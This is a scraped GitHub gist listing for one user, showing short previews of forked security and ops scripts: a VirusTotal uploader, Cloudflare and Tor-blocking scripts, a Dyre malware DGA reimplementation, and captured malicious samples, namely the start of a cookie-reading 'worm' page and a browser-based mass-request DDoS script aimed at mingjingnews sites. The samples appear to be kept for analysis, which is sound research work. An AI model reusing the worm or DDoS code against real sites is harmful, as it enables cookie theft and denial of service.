@xxdesmus
xxdesmus / README.txt
Created Jan 29, 2018 — forked from whitequark/README.txt
Strava archiver
View README.txt
1. install postgres
2. run makedb.rb >tiles.csv
3. run tiles.sql
4. run archive.rb
5. enjoy
xxdesmus / virustotal_upload
Created Nov 1, 2017 — forked from mattghali/virustotal_upload
Upload a sample to VirusTotal and pretty print the report. All in a handy alias.
View virustotal_upload
#!/usr/bin/env bash
#
# Upload a sample to VirusTotal and pretty print the report.
# All in a handy alias.
#
# Dependencies:
#
# * curl
# * jq
# * VirusTotal API key
View gdocs.pro-worm
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
xxdesmus / ddos-from-baidu.js
Created Aug 23, 2017 — forked from nczz/ddos-from-baidu.js
Baidu hides malicious code in its active URL push method
View ddos-from-baidu.js
xxdesmus / mingjingtimes-ddos-code.js
Created Aug 23, 2017 — forked from nczz/mingjingtimes-ddos-code.js
Mingjing Times malicious mass-request attack code
View mingjingtimes-ddos-code.js
if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
var MAX_TIME = 300000;
var url_list = ['http://news.mingjingnews.com/', 'http://s1.mingjingnews.com/', 'http://tv.mingjingnews.com/', 'http://www.mingjingtimes.com/'];
var MAX_COUNT = 100000000;
var TIMEGAP = 500;
var THREAD = 10;
var START_CLOCK = 1;
function unixtime() {
var dt = new Date();
xxdesmus / cloudflare-ipset.sh
Created Mar 30, 2017 — forked from KiNgMaR/cloudflare-ipset.sh
Cloudflare IPTABLES and IPSET scripts
View cloudflare-ipset.sh
#!/bin/sh
# name of the ipset - v4 or v6 will be appended.
IPSET_NAME=cloudflare-
# argument: v4 or v6 (defaults to v4)
cloudflare_ipset ()
{
local ipv
local inetv
xxdesmus / gist:72e9254963ebea33a0d2
Created Nov 28, 2015 — forked from sethkinast/gist:5914577
Tiny script to grab Tor exitnodes and ban them via CloudFlare's API
View gist:72e9254963ebea33a0d2
#!/bin/bash
SERVERS=(108.162.196.125 108.162.197.125)
for server in "${SERVERS[@]}"
do
echo "Now processing $server"
wget --timeout=10 -t1 -O tor.txt "https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=$server"
for ip in `tail -n +4 tor.txt`
xxdesmus / wget.txt
Created Sep 28, 2015 — forked from suzannealdrich/wget.txt
wget spider cache warmer
View wget.txt
wget --spider -o wget.log -e robots=off -r -l 5 -p -S --header="X-Bypass-Cache: 1" live-mysite.gotpantheon.com
# Options explained
# --spider: Crawl the site
# -o wget.log: Keep the log
# -e robots=off: Ignore robots.txt
# -r: specify recursive download
# -l 5: Depth to search, i.e. 1 means 'crawl the homepage', 2 means 'crawl the homepage and all pages it links to'...
# -p: get all images, etc. needed to display HTML page
# -S: print server response
View dyre-dga.py
#! /usr/bin/env python
# Dyre/Dyreza DGA
# Implementation by Talos
# From http://blogs.cisco.com/security/talos/threat-spotlight-dyre
# Another Python implementation was also posted back in December 2014 by moritz.kroll:
# https://www.virustotal.com/en/file/3716902c64afe40369e6ed67f9b9f7eea30f809348b3558adcff622965e80435/analysis/
from datetime import date
from hashlib import sha256
from socket import gethostbyname, gaierror
View vpnsetup.sh
#!/bin/sh
#
# Amazon EC2 user-data file for automatic configuration of IPsec/L2TP VPN
# on an Ubuntu server instance. Tested with 14.04 (Trusty) AND 12.04 (Precise).
# With minor modifications, this script *can also be used* on dedicated servers
# or any KVM- or XEN-based Virtual Private Server (VPS) from other providers.
#
# DO NOT RUN THIS SCRIPT ON YOUR PC OR MAC! THIS IS MEANT TO BE RUN WHEN
# YOUR AMAZON EC2 INSTANCE STARTS!
#